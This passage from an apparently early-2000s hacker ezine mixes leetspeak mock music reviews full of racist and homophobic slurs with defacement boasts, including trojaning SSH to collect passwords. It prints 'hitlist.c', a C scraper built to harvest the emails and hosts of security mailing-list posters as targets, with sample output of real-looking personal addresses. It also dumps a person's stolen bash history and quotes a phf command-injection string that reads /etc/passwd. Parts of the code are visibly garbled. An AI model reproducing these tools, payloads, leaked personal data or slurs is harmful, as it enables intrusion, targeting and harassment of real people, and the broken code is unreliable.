bl4d3 1d st4b h1m w1th a t00thp1ck, 1c3 l1v3z w1th h1z m0m & 1 h34r fl4m3z g0t a sm4ll d1ck.... y0 y0 aiy0 d0nt step 2 my krew, kuz 1ll fuqn k4p y0u. f00. t4p t4p ch3q." d4mn! iz all i k4n s4y, koz th3 c0c00n 1z full 0f th1s sh1t. 4ngry lyrix... th3y t4lk ab0ut st4bb1ng th3ir l4wyerz 1n c0urt, dr1nk1n 40z wh1le talkin on th4 I SEEK Y0U, buztn 0ut 0f j41l l1ke n3d k3lly, b1tch3z 1n h1gh sk00l th@ cheat 0n algebr4 t3stz, h0w much p4y1ng ch1ld supp0rt 4 a bunch 0f k1dz suxxxx, m4n 1 d0nt even want 2 sp0il th1z, itz tru-thug. pers0nally my fav0r1te tr4ckz 0f th1z cd r #2. CHEATERZ & #11. THE COURTR00M and 13. SH0W THEZE k4TZ (lab3ll3d 0n th31r webs1te az *H0T*). wh4t3v3r they d3c1d3 2 d0, r00tabega k33pz a p0s1t1v3 1m4g3. r1sh1, 4z y0ung 1nd14n b0y gr0wn up 1n th3 gh3tt0 h4d 2 s1t by and w4tch h1z y0unger br0ther wear1ng a ch1cag0 bullz jerzey get gunn3d d0wn 2 d34th by cr1pz. s331ng s0 much vi0lence in h1z d4y, & w4tch1ng h1z g00d h0meb0yz m0st8d & l00ph0le & m1ndphazr g0 2 the p3n, he m0urnz 4 th31r return & the dayz 0f tru defac3m3nt thugg3ry. 1n hiz s0ngz, he expl41nz, h0w new sk00l def4c3rz just d0nt underst4nd what 1t uz3d 2 m34n 2 the el8z, the gHerz, the 3lv3z. th1z album 1z def1n1tely a 2 thumbz up. w00w00 ------ ch3ck 1t 0ut @ http://www.w00w00.org/w00w00.mp3 w1th 0ver 30 memb3rz w0rldw1de & th1z 1z the b3st sh1t they k0uld k0me up w1th!?!?!?!? th1z 1z fuqn kr4p, 1tz even w0rse than th31r k0d3z. w0uld u listen 2 a k0p r4pp1ng? 0k damn, s0 why the phuq w0uld u l1st3n 2 a bunch 0f wh1teh@ l4m3rz pr3t3nd1ng 2 haq. 1f 1 were 1n the wu-t4ng kl4n 1 w0uld kut their n*tz 0ff, espec14lly th@ n4spt3r f4g. m1xt3r ------ 0k well th1z 1znt r34lly "thugg1sh" but 1tz undergr0und h4qr muz1k s0 uncle m4v1s dec1d3d 2 rev1ew 1t just 4 u. & th1z 1z n0 disappo1ntment e1th3r. m1xter haz sh0wn he d0eznt just kn0w h0w 2 wr1te wh1tepap3rz 4 packetst0rm, he k4n als0 wr1te s0me ph@ muz1k 2! m1xt3r d0eznt even try 2 be a thug, h3z just pure h4qr. w1th s0ng n4m3z like "/usr/bin/strings" and "1ntrusi0n det3kt3d" and "/cgi-bin/phf?Qalias=%0acat%20/etc/passwd." 1 def1n1tely w0uld n0t rec0mmend th1z 4 l1st3n1ng 2 pe0ple outs1d3 0f the 'sc3n3' becuz it iz 1nf0rmation 0verl0ad! but 4 th0ze 0f u wh0 th1nk u h4v3 wh4t 1t t4k3z 2 dec1ph3r hiz kryptik msgz, u k4n f1nd h1z muzik @ http://www.mp3.com/mixter/ th3z3 s0ngs rem1nd me a l0t 0f th1z 0ne t1me 1 s4w th3z3 2 austrian d00dz french k1ss1ng each0ther in an 'E wild 0n 1b1z4.' but enuf of th@ /usr/bin/strings s0undz a bit retro, with s0me atar1 l1ke s0undz 2 rem1nd u of exactly h0w 0ld sk00l m1xter really is, & synthlinez th@ w0uld bl0w depeche m0de 0ut 0f the w4t3r. m1xt3r, as he l1k3z 2 r3f3r 2 himself az 'DJ MIXY' 2 th3 r3st 0f the w0rld 0fferz h1z serv1c3z 2 th3 c0mmun1ty by dj'ing in s4f3 drug phr33 b4r m1tvahz in t3l av1v, where h1z t0pn0tch internet sekur1ty k0mpany w1th phell0w h4ck1ng st4rz ANALYZER and IZIK of hwa-security/d4rkn3t 1z l0c8d. s0met1m3z when he iz juzt "chiln 0ut" he k4n be f0und d4nc1ng @ w1ld r4v3z @ the g4z4 str1p w1th h1z p4t3nt3d redwhite'nblue gl0wst1ckz & vickz inh4l3r. but h3 d03z m0st 0f h1z w0rk 4 fr33, s1nc3 az m4ny grey/bl4ckhatz he shunz the c0mmercializ4t10n 0f s0phtjuarez & releasez hiz trax under GPL! he als0 h0pez th@ 0ne day s0meb0dy w1ll B insp1r3d by h1z s0ngz 2 0wn a univers1ty netw0rk w1th m1cr0s0ft w1nd0wz src k0de & d0n8 the ph1nd1ngz 2 him! ~el8 4tt3mpt3d 2 k0nt4kt mixter 4 an 1nterv1ew ab0ut h1z muz1k but he angrily d3kl1n3d, s4y1ng he w0uld never 't4lk 2 u squinty 3y3d m0th3rphuckrz' as l0ng 4s 'th3 br34th 0f l1fe fu3l3d h1z b0dy.' h3 th3n ch4ll3ng3d uncle m4v1s 2 "get my passw0rd ph1le again" s1nce h1z b0x d0eznt all0w 0utg01ng em41lz 2 j4p4n anym0r3. th1z wuz unfphortun8 but 4 the s4ke 0f 0bjekt1v1ty uncle m4v1s g1vez thiz album a "p0sitive" rev1ew. y0 well th@z all the muz1k 1 k0uld find 4 n0w! r3m3mb3r 2 k33p 1t r34l peace 0ut d/-\wGz. .~e~----------------------------------------------------------~e~. ; *06* defacements of the milenium -- ~el8 ; `----------------------------------------------------------------' -----------------------. anti.security.is owned 0 ~~~ :PpPPppPPPp -----------------------' turkey Oh, life it's bigger, it's bigger than you and you are not me The lengths that I will go to, the distance in your eyes WE ARE THE HACKERS WHO ACTUALLY HACK. UNLIKE OTHER "HACKERS," WE DON'T SIT ON OUR WAREZ. ACTION SPEAKS LOUDER THAN SILLY WORDS. GOBBLES IS ABOUT GETTING THINGS DONE. THANKS TO THE POP PSYCHOLOGISTS ON THE ANTISEC MESSAGE BOARD. YOUR COMBINED PSYCHOANALYSIS MISSED UNCONTROLLABLE URGES TO DEFACE SECURITY WEBSITES THOUGH! 2002 IS YEAR OF TURKEY. MAKE NO MISTAKE ABOUT THIS. AND THERE'S NOTHING ANYONE CAN DO... THIS HACK MADE POSSIBLE WITH BITCHX REMOTE EXPLOIT AGAINST JIMJONES HOME COMPUTER THEN TROJANING HE SSH TO COLLECT PASSWORDS... ------------------------. udp's livejournal owned 0 ~~~ :PpPPppPPPp ------------------------' [2041] udp the lame phrack whore's LiveJournal [Most Recent Entries] [Calendar View] [Friends] Below are the 20 most recent journal entries recorded in udp the lame phrack whore's LiveJournal: [ << Previous 20 ] Monday, December 31st, 2001 12:42 pm Been rereading Leisure Town and laughing my ass off. (Comment on this) 11:38 am owned in the 2002 yo chek it, im fat & owned keep it re4l libnetx25 el8.8m.com watch your back we out (Comment on this) Sunday, December 30th, 2001 4:12 pm Add Hope Sandoval to the list from the 25th. Fantastic. :) Current Music: Mazzy Star - Wild Horses(2 Comments |Comment on this) 1:38 pm mmm. the big chill. you must get this track. Current Mood: chillllled Current Music: Mescalito - Shoreditch Oyster(Comment on this) 1:23 pm Desi-derata. Current Mood: caffeinating Current Music: Mescalito - Dark Corner Light(Comment on this) Saturday, December 29th, 2001 10:10 pm hrm. looking at wmglobe, again, it seems most of the populated human world is in darkness right now. whack. the sun's shining high above the pacific; the pacific's enormous. Current Music: Veruca Salt - Bodies(Comment on this) 3:14 pm Obviously CURRENT doesn't like my dirty hack of hijacking the IPPROTO_RSVP pointer in ip_protosw[]. (Comment on this) 3:09 pm the sun is out. free of its grey bonds finally. eclectic love washing over the city. (Comment on this) 2:57 pm Bah! I just loaded my driver into -CURRENT - BOOM! Works fine on -STABLE though. Oh well, hacking time... (Comment on this) 11:47 am Protected A rare sighting *o* mudge [~mudge@0nus.l0pht.com] has joined #cdc *o* irc.carrier1.net.uk Saturday December 29 2001 -- 11:44:25 +00:00 Hm! Just as I was about to head out for lunch, too... (Comment on this) 11:43 am Musings on zen and singing. An overcast day in London today. Dull grey cloud settled over the city like white taffy, hydrogenated, a smooth constriction. I rise, wash, put my boots on and make coffee. I feel the cool air rise against my damp, freshly depilated skin. The thermostat clicks as the heater switches off, the aesthetic of warmth lost on the machine, for it is thus. I run my hand over my forehead, and around my fringe. I smile, knowing what it is to live in the moment, and that though our best laid plans and fondest dreams may never come to fruition, living in the moment is that which is most important. After a spate of not being able to sleep well, I suddenly find myself enjoying the most pleasant, restful night's sleep, and this has been the case some three nights in a row now. Last night my final thought before leaving wakefulness was this: how does Kate Bush feel about her success and her life? I wonder if she has always wanted to be where she has gotten to. I think one could well ask these questions of any successful person. Is it atypical to be blown off one's original course, and yet still discover one's own New World? Or is it an occupational hazard? When hungry, eat. When tired, sleep. (Comment on this) 12:25 am There are some screen grabs of my desktop from today here. (3 Comments |Comment on this) Thursday, December 27th, 2001 1:26 pm Ok. I submitted 7 new FreeBSD ports inside 12 hours. Can I have a biscuit? (2 Comments |Comment on this) 7:24 am Submitted FreeBSD port for x11-fonts/gfe (GNU Font Editor 0.0.4). (Comment on this) Wednesday, December 26th, 2001 10:05 pm Without memories, a race has no future. (3 Comments |Comment on this) Tuesday, December 25th, 2001 1:20 pm A quiet day of fond restitude, for the weary traveller. Mmmm. Having a very chilled out Yule; curling up with some Baileys and wotnot, listening to music and reading books. What a holiday should be at this time of year, I think. A time to nurture dreams anew and sow amongst the furrows of the psyche. Been on a different tack with mp3 playlists lately, need female vocalists to pace out all this D'n'B, industrial, trance... so this manifests itself in the form of Tori Amos, Paula Cole, Beth Orton, Alison Moyet, Louise Post (of Veruca Salt fame), Sarah McLachlan, and of course, Kate Bush. As for the delectable Ms Bush, she will hopefully have an album out during 2002, which I am looking forward to with anticipation. I still hold Wuthering Heights to be one of her best tracks of all time... In the meantime, you might like to check out Paula Cole's work. She teamed up with Peter Gabriel on his Secret World Tour in 1993, and you can hear her passion, and diverse vocal range, on tracks such as Talk To Me and Hush Hush Hush. Those of you who are fans of Peter Gabriel also will also clock that Peter's last longstanding female vocal partner was... stand up, Kate Bush! As a longstanding fan of Peter's work I have to say I admire his knack for working with the female voice. He confessed that it was a skill he acquired over many years, in an interview on ITV (1993, UK); indeed much of his work from the late 1970s, after he split from Genesis, took on more of a masculine edge than what one experiences from his albums So (1986) and Us (1992); the latter was produced by the brilliant Daniel Lanois, featured on U2's superb Achtung Baby (1990). Paula, however, reveals a much flirtier side to her work, in a song from the motion picture soundtrack for the Wim Wenders film City of Angels, a track entitled Feelin' Love. As you can see from the lyric sheet, it's quite candid, but you really have to hear her singing this; she manages to come across as sensual without being kitsch or trashy. It's a departure from her other tracks, lest we begin to think the adorable Miss Cole is a goody two-shoes. I can't really put into words how enthused I am by her talent. Her voice helps to create a fertile creative space for me; it's only over the past two years or so that I've begun to realize how essential the immediate environment is to the creative act, be that making music, writing code, sculpting; or any other form of play. Isolation alone is not the way to get the job done; often it's good to invite a bunch of friends over, share the Baileys or Jasmine tea or whatever the tipple is, and then return to one's work, having given the machine-mind a rest and returned to social consciousness, if only for a few hours. My plans for 1Q 2002 are still being worked on; I also need to decide what to do this upcoming summer. I'm open to suggestions for places to visit, hang out, have a good time. And like that rubberband girl in the red shoes, I bounce back on my feet. Fond greetings to friends present and past, in whatever mode you choose to celebrate the Solstice; I wish you all well. Current Mood: pleasantly inert Current Music: Kate Bush - Rubberband Girl(1 Comment |Comment on this) Thursday, November 29th, 2001 2:16 pm Just woke up. Urrrrrrrrgggggh. Upgraded the -CURRENT box late last night - the change alone from a Realtek to an Intel FXP makes a *massive* difference. FreeBSD now supports every single bit of hardware in the box. Matt Dillon gave an interview very recently where he cites the current SMPng work and the OpenGL support as the main hurdles to be overcome for FreeBSD at the moment. I agree - once OpenGL support is in place, I will have very little reason to run Windows, or even Linux, for that matter, ever again. One exception is IrDA support, but I might choose to port that anyway. Anyway. I'm eating a pot rice at the moment, deferring real food until we (people are here) decide what we're going to do. *stretches* (Comment on this) Wednesday, November 28th, 2001 11:11 am Is it any wonder I can't sleep? (apologies to Smashing Pumpkins) Woke up at 10pm last night, my sleeping pattern is TOTALLY shafted... it's out of control, and the kids just love it! (props to KMFDM...) As of this morning I've written FreeBSD ports entries for Dug Song's libdnet, a portable packet generation and low-level networking API, and Tony Curtis's wots, which is an extremely cool system log monitoring program written in Perl. I've been using wots for literally years now. Rock on. Hopefully other people will find them useful. qtop is working spankingly for my droptail queues on the WaveLAN gateway, but I need to clean up the code, fix it to work with RED/wRED dispatcher, and get it committed to FreeBSD-CURRENT. Current Music: Technical Itch - Deadline(Comment on this) Monday, November 26th, 2001 9:25 am Access granted. I've just written and released a tool to perform real-time monitoring of the FreeBSD Bandwidth Shaper, as part of the Consume Project. It's essential that we be able to throttle bandwidth on a per-node basis to prevent wired links to the mobile cloud becoming saturated. This tool will help us to configure the bandwidth shaper at each node. Getting the hang of the masking for the packet flow sets is quite tricky; this will help the community networking effort by allowing people to experiment with bandwidth throttling and getting visual (as well as anecdotal) feedback on the effect of their configuration changes. You MUST get the track I'm listening to. At the moment I'm pretty frazzled on caffeine having been awake for most of the weekend and Friday, and have the heating turned down to keep me frosty. Oh yeah. What else is cool. ParMaster hung with us at the weekend. Current Mood: accomplished Current Music: Apoptygma Berzerk - Kathy's Song (Ferry Corsten Remix)(1 Comment |Comment on this) Monday, November 19th, 2001 3:06 am ick, writing parsers is such a chore. (Comment on this) [ << Previous 20 ] My Website About LiveJournal.com .~e~----------------------------------------------------------~e~. ; *07* ~el8 hitlist tools -- uncle m4v1s ; `----------------------------------------------------------------' ~el8 ~el8 has has generated generated hitlists hitlists for for every every security security related related mailing mailing list list known 4r3z known to urfukd to mankind mankind h3re y0u g0 d00dz, str8 fr0m the ~el8 w4r3z gr4bb4g. th1s t00l w1ll h3lp 0ur f0ll0w3rz by cre4t1ng h1tl1sts of emails/systems that p0st t0 vari0uz security f0cus mailing lists. ~el8 ADVISORY STYLE S0LLUTI0N: d0nt p0st t0 th3z3 mail1ng lizts ex4mple 0utput: $ ./hitlist 1 LAMER: sh0@libertynet.de (sh0) LAMER BOX: cybersilo.lnx LAMER: tsmith@zonelabs.com (Te Smith) LAMER BOX: mail.securityfocus.com LAMER: merchantjosh@qwest.net (Joshua Merchant) LAMER: draht@suse.de (Roman Drahtmueller) LAMER BOX: dent.suse.de LAMER: secnotif@microsoft.com (Microsoft Product Security) LAMER: newsflash@macromedia.com (Macromedia Security Alert) LAMER BOX: rsigate.macromedia.com LAMER: joacim@axis.com (Joacim Tullberg) LAMER BOX: mail.securityfocus.com LAMER: tluce@pti-pump.com (Timothy Luce) LAMER BOX: PTIPump.com LAMER: support_feedback@us-support.external.hp.com (IT Resource) LAMER: wichert@wiggy.net (Wichert Akkerman) LAMER BOX: wiggy.net LAMER: raistlin@gioco.net (Raistlin) LAMER: cadence@apollo.aci.com.pl (Tomasz Grabowski) LAMER: dotslash@snosoft.com (KF) LAMER BOX: snosoft.com LAMER: flatline@blackhat.nl (flatline) LAMER BOX: mail.werkopmaat.nl LAMER: adonis1@videotron.ca (Adonis.No.Spam) LAMER BOX: videotron.ca LAMER: gobbles@hushmail.com LAMER BOX: mailserver1.hushmail.com LAMER: seclsts@fast.net (Rich Henning) LAMER BOX: fast.net LAMER: alexm@pycckue.org (alex medvedev) LAMER: pr0ix@def-con.org (pr0ix) [CUT_HERE] hitlist.c /* * l4m3r l1zt3r v1.0 by uncle m4v1s * th1z 1z a s1mple t00l th@ ~el8 haz been uzing 4 several ye4rz, * ever s1nce pr0ject m4yh3m wuz 1st st4rt3d. * 1tz a 1-use t00l, juzt run th1z on any 0ne of the k-l4m3 * s1tez upd8d by secur1tyf0cus.com on the1r ml-p0rtal, & * u n0w h4ve a l1zt 0f ret4rdz 2 hack and st34l "0day" from. * th1zt skr1pt g0ez back s3v3ral ye4rz s0 u get the ch4nc3 2 * ch3ck 0ut r34l b0xez th@ were uz3d be4 the gr34t p4n-l4m3r * 3ff0rt 2 get sc3n3 sh3llz 2 h1de the1r 1dent1t3z. * by t4rg3tt1ng p0stz by p0l1te sekur1ty pr0fess10nalz & * 0wn1ng the1r `sh1t` and r4v4g1ng th3 kn0wn_h0stz 0n the ab0ve * b0x3z, we n0t1c3d the subtl3 c0rrel4t10n betw33n m4n & myth, * 4nd st4rt3d 2 rek0gn1z3 the k0rrel4t10n betw33n REAL PEOPLE & * the 0nl1ne 1dent1t3z they assum3d. 4 example, 0wn 4ll russ14n * bugtraq p0st3rz s1nce 1997 and u w1ll n0t1c3 4t l34zt 0ne 0f * th3m l0gg1ng 1nt0 z0l0.fr33lsd.n3t/c4nn4b1z.dataf0rce.net (hi str!) * 4nyh0w, 4z rule #2 of pr0jekt m4yh3m g0ez, if u c4nt st34l w4r3z * 0r sn1ff, rm the fukrz! * h4ppy hunt1ng */ #include #include #include #include #include #include #include #include #include #include #define PREFIX "GET http://online.securityfocus.com" #define BASE_CMD "GET http://online.securityfocus.com/archive/1" struct sockaddr_in sinz; struct target{ char *lamercode; char *url; } targets[] = { {"ARIS USERZ","GET http://online.securityfocus.com/archive/114"}, {"bugtraq[lol]","GET http://online.securityfocus.com/archive/1"}, {"bugtraq-es (bugtraq in spain jajaja)", "GET http://online.securityfocus.com/archive/80"}, {"bugtraq-jp & shadowpenguin friendz", "GET http://online.securityfocus.com/archive/79"}, {"cisspstudy [inspired by dr. crispin cowin]", "GET http://online.securityfocus.com/archive/99"}, {"focus-ids [cant sekure a b0x so they use ids]", "GET http://online.securityfocus.com/archive/96"}, {"choose this if u have linux 0day", "GET http://online.securityfocus.com/archive/91"}, {"choose this if u have win32 0day", "GET http://online.securityfocus.com/archive/88"}, {"choose this if u have solaris 0day", "GET http://online.securityfocus.com/archive/92"}, {"scan here for bo2k", "GET http://online.securityfocus.com/archive/100"}, {"forensics (prolly not worth it, they r already 0wned)", "GET http://online.securityfocus.com/archive/104"}, {"honeynet [leave burneye encrypted kopiez" " of nmap 4 lance sp1tzner here]", "GET http://online.securityfocus.com/archive/119"}, {"incidents [see how well pr0ject m4yh3m is d0ing", "GET http://online.securityfocus.com/archive/75"}, {"pen-test [people like s1 here hehe]", "GET http://online.securityfocus.com/archive/101"}, {"sec-papers [4 the literary inkl1n3d like warzael zarcae", "GET http://online.securityfocus.com/archive/112"}, {"security-basics PAHAHAHAHAHA n3wb13z ripe 4 the picking", "GET http://online.securityfocus.com/archive/105"}, {"security-certification [l4m3rz who have subskr1b3d" " 2 security-basics longer than 2 weekz", "GET http://online.securityfocus.com/archive/106"}, { "security-jobs [own theze fuckerz quick, they r desperately" " trying 2 publish 0day]" ,"GET http://online.securityfocus.com/archive/77"}, {"vpn [hehe launch pptphack here]", "GET http://online.securityfocus.com/archive/50"}, {"vuln-dev <- th3 m0ther l4m3r sh1p h4z l4nd3d", "GET http://online.securityfocus.com/archive/82"}, {"choose this if u have shopping kart cgi po1z0n byte warez", "GET http://online.securityfocus.com/archive/107"} }; void printdates(char *url) { char *ptr; int bday,bmonth,byear,eday,emonth,eyear,num; #define MAGIC "/archive/1/" ptr=strstr(url,MAGIC); if(ptr==NULL) return; num=sscanf(url, "/archive/1/%d-%d-%d/%d-%d-%d/" ,&byear,&bmonth,&bday,&eyear,&emonth,&eday); printf("LAMER CHRONOLOGY: "); if(num!=6) printf("ERROR IN PARSING BUT WH0 KAREZ\n"); else printf ("%d/%d/%d to %d/%d/%d\n", bmonth,bday,byear,emonth,eday,eyear); fflush(stdout); } char *makeurl(char *end) { char *r; int size=strlen(PREFIX)+strlen(end)+4; r=malloc(size); if(r==NULL){ fprintf(stderr,"hmm out 0f memory... might be 4 f0rq b0mb!\n"); system("ps -u cr"); exit(-1); } memset(r,0,size); strcpy(r,PREFIX); if(*end!='/') strcat(r,"/"); strcat(r,end); strcat(r,"\r\n"); return r; } void sendcmd(int fd,char *cmd) { write(fd,cmd,strlen(cmd)); write(fd,"\r\n\r\n",2); } int connecthost(void) { int fd; fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if(fd<0){ fprintf(stderr,"out of socketz... weird\n"); system("ps aux|egrep tron|mixter|felix"); exit(-1); } if(connect(fd,(struct sockaddr*)&sinz,sizeof(sinz))<0){ fprintf(stderr, "cant connect to online.securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } return fd; } /*f-fgetz*/ char* readline(int fd) { static char buf[8192]; char yo; int i = 0; memset(buf,0,sizeof(buf)); for(i=0;iMessage-ID:<"); if(ptr==NULL) goto checkauthor; ptr+=13; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; ptr++; ptr=strchr(ptr,'>'); if(ptr==NULL) goto checkauthor; while(*ptr&&*ptr!='@') ptr++; if(!*ptr) goto checkauthor; ptr++; startbox=ptr; while(*ptr&&(isalnum(*ptr)||*ptr=='.')) ptr++; if(!*ptr) goto checkauthor; *ptr=0; /*s4n1tych3ck*/ if(strchr(startbox,'.')==NULL) goto heh; printf("\t\tLAMER BOX: %s\n",startbox); goto heh; checkauthor: ptr=strstr(l,">Author:<"); if(ptr==NULL) goto heh; ptr+=10; ptr=strstr(ptr,"mailto:"); if(ptr==NULL) goto heh; ptr+=7; startemail=ptr; ptr=strchr(ptr,'"'); if(ptr==NULL) goto heh; *ptr++=0; ptr=strchr(ptr,'>'); if(ptr==NULL) goto heh; startname=++ptr; ptr=strchr(ptr,'<'); if(ptr==NULL) goto heh; *ptr=0; printf("\tLAMER: %s",startemail); if(strlen(startname)) printf(" (%s)",startname); printf("\n"); fflush(stdout); heh: l=readline(fd); } close(fd); } /*cykle thru ind3z p4g3z*/ char *letitrip(int fd) { char *l=readline(fd); char *ptr,*start=NULL,*nexturl=NULL,*lamerpost; while(l!=NULL){ /*YO*///printf("line = %s\n",l); /*try p0stz first*/ #define SEKRETKEY "
'); if(ptr==NULL) goto heh; ptr++; if(strstr(ptr,"prev Week")==NULL) goto heh; /*w0rd here iz the previ0uz week*/ if(nexturl==NULL) nexturl=strdup(start); heh: l=readline(fd); } return nexturl; } int main (int argc,char **argv) { struct hostent *he; int fd; char *newurl,*startpoint; if((argc>2)||((argc==2)&&(!strcmp(argv[1],"-h")))){ int i; fprintf(stderr, "l4m3rl1zt3r usage: %s <#>\nwhere # is a l4m3r k4t3g0ry, defaultz 2 bugtraq\n\n",argv[0]); fprintf(stderr,"l4m3r k4t3g0r1ez:\n"); fprintf(stderr,"-----------------\n"); for(i=0;i=(sizeof(targets)/sizeof(struct target))){ fprintf(stderr,"s0rry kouldnt find specif1ed l4m3r...\n"); fprintf(stderr, "there r many more lam3rz, ~el8 iz working ar0und" " the cl0q 2 upd8 thiz program with the necessary 2385915 entriez.\n"); fprintf(stderr,"try a valid # tho\n"); exit(-1); } startpoint=targets[choice].url; } else startpoint=BASE_CMD; fprintf(stderr,"l4m3rl1zt3r v1.0\n"); fprintf(stderr,"by uncle m4v1s\n"); fprintf(stderr,"k0pyright (K) 2002 ~el8 research labz\n"); fprintf(stderr,"for help, try -h\n\n"); he = gethostbyname("online.securityfocus.com"); if(he==NULL){ fprintf(stderr,"cant resolve online." "securityfocus.com...project mayhem successfully accomplished!\n"); exit(-1); } memset(&sinz,0,sizeof(sinz)); sinz.sin_family=AF_INET; sinz.sin_port = htons(80); memcpy(&sinz.sin_addr,he->h_addr,4); fprintf(stderr,"acquiring t4rget l1zt...!\n"); fprintf(stderr,"begin l4m3r l1st tr4nsm1ss10n!\n"); printf("------------------------------\n"); fd=connecthost(); sendcmd(fd,startpoint); printf("LAMER CHRONOLOGY: CURRENT\n"); fflush(stdout); newurl=letitrip(fd); close(fd); if(newurl==NULL){ fprintf(stderr,"weird..some un3xpekt3d sh1t happened!\n"); exit(-1); } while(newurl!=NULL) { char*req; fd=connecthost(); req=makeurl(newurl); sendcmd(fd,req); printdates(newurl); free(newurl); free(req); newurl=letitrip(fd); close(fd); } printf("-------------------------------------\n"); fprintf(stderr,"we h4v3 d3t3kt3d 4ll p0ss1bl3 l4m3rz!\n"); fprintf(stderr,"n0thing l3ft 2 d0..m4ybe ch3ck #!el8.\n"); fprintf(stderr,"-------------------------------------\n"); return 0; } [END_CUT] hitlist.c .~e~----------------------------------------------------------~e~. ; *08* bronc buster busted -- RLoxley ; `----------------------------------------------------------------' Hey guys, this is RLoxley (Robin Hood of Loxley) from hackphreak.org. I wanted to get my website in your ezine again, and tell everyone how ethical hacking is the best hacking ever. I have included bronc's bash history from one of my machines. Also, remember young hackers, if you break into a system, tell the admin how to patch it, do a good deed for society. If you hack any child porn people, turn them into authorities and send all of the downloaded movie/picture evidence to my personal account: rloxley@hackphreak.org. Stop child porn! Here it is: # cat .bash_history ssh -l bronc 2600.com ssh -l bronc 2600.com w ps aux|grep bronc kill -9 24409 24424 24428 ps aux|grep bronc w telnet localhost exit ssh -l bronc 2600.com w telnet localhost exit w ping succeed.net traceroute succeed.net su bogus exit ping succeed.net w -su BitchX bronc irc.freei.net traceroute succeed.net w telnet fingers exit su - exit ssh 2600.com exit vhosts BitchX bronc -H openGL.3dlinux.com irc.core.com BitchX BitchX bronc -H openGL.3dlinux.com BitchX bronc ls ls -l BitchX whereis BitchX ls -l /usr/local/bin/BitchX cd /usr/local/bin ls ls -l|more rm BitchX su - cd BitchX bronc -H openGL.3dlinux.com irc.core.com ifconfig vhosts BitchX bronc -H underpaid.sysadmins.com irc.core.com exit su - exit su - exit su - exit su - exit w finger lusta ps aux|more ps aux|grep ftp ftpusers su - ls cd ~ftp ls cd pub ls ftp fingers cd exit w clear exit w talk pt ls ls -l cygnus-20-full.exe su - exit ifconfig su - exit w su - su - su w fingew luat finger lusta finger pt cat /etc/suauth grep bronc /etc/group w su - grep root /etc/passwd cat /etc/motfd cat /etc/motd cd /var/log ls grep su messages|tail grep su messages|tail - 20 grep su messages|tail 30 grep su messages|tail -30 grep root messages|tail -30 ps aux|grep sendmail finger pt ssh fingers ssh fingers grep root messages|tail -30 grep root messages|grep su|tail -30 su - su - w uptime cd /etc ls -l passwd id cd ls cd ap ls cd .. ls w ssh lemon ssh lemon ssh gratefuk ssh grateful ssh grateful.org su bogus telnet grateful.org ssh fingers ssh fingers exit su - more .profile myvar hour myvar=`ifconfig|grep inet| awk -F: '{print $2}'` su - exit man ftp qcq pico ftptest mkdir test touch test.X ./ftptest chmod 777 ftptest ftptest pico ftptest ftptest pico ftptest ftptest pico ftptest ftptest mv test.X text.X ftptest cd test ls cat ftptest cd .. cat ftptest rm ftptest rm -rf test rm text.X exit w finger lusta su - exit showmount su - exit ssh -l eginorio ssh.cisco.com ssh -l eginorio bigleague.cisco.com ssh -l eginorio paullew-ultra.cisco.com exit cd /users cd /home ls cd users/ ls cd ../wheel/ ls w finger geoff finger ficus deluser userdel remuser su - exit ls ssh attrition.org ssh 2600.com exit ssh 2600.com exit ssh 2600.com w exit nslookup phalse.2600.com nslookup phalse.2600.com ssh shocking.com exit ssh attrition.org ssh attrition.org ssh attrition.org exit ssh 2600.com ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org xit eixt exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit sh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh -l eginorio ssh.cisco.com exit ssh -l eginorio ssh.cisco.com ssh attrition.org exit ssh attrition.org ssh attrition.org~ ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit ssh attrition.org exit exit ssh attrition.org exit pwd ls cd lemon/ ls cd bronc/ ls cd bb ks ls cd .. ls -l cd code ls cd .. ls pwd cd .. ls -l cd .. ls -l cd www ls ls l cd .. ls -l cd ap ls ls -l cd .. cd code ls cd .. ls -l w exit ls hosts host ifconfig -a /sbin/ifconfig -a cat /etc/host cat /etc/hosts cat /etc/host.conf netstat -a w /sbin/ifconfig -a nslookup 199.1.199.115 nslookup 199.1.199.114 nslookup 199.1.199.113 xaric --help xaric -H underpaid.sysadmins.com w /sbin/ifconfig -a nslookup 199.1.199.199 nslookup 199.1.199.122 nslookup 199.1.199.100 xaric -H 3dfxlinux.com nslookup 199.1.199.101 nslookup 199.1.199.102 nslookup 199.1.199.103 xaric -H asskick.com traceroute web2.sea.nwserv.com whois nwserv.com whois nwserv.com@whois.networksolutions.com w exit ssh attrition.org exit ls cd code/ ls cd .. ls cd lame/ ls less qpop.c clear exit finger lusta w w ifconfig -a /usr/sbin/ifconfig 0a /sbin/ifconfig -a w finger jamf nslookup 209.107.55.2 ftp ftp.bitchx.org ls ls -l ircii-pana-75p3.tar.gz w host -l vhost.shocking.com /hostname hostname BitchX w xaric bronc us.undernet.org w w write jamf w w w w w w w write jamf w exit w w write jamf w ps aux|grep jamf w exit w exit w exit su- underpaid exit w exit passwd w ftp localhost ls ls ls ls ls -l ENSC.opx passwd w ps aux|grep bronc kill -9 13856 ls ftp fingers.shocking.com exit w finger jamf exit ls cd co cd code ls tar -tv ssh-1.2.25.tar.gz cd .. ls cd lemon/ ls ls -l cd bronc/ sl ls cd code/ ls cd .. cd 0day/ l;s ls less sshdexp.c cd ls cd ap/ ls cd exit .~e~----------------------------------------------------------~e~. ; *09* lcamtuff helps ~el8 -- lcamtuf ; `----------------------------------------------------------------' To: BugTraq Subject: yet another fake exploit making rounds Date: Dec 20 2001 8:58PM Author: 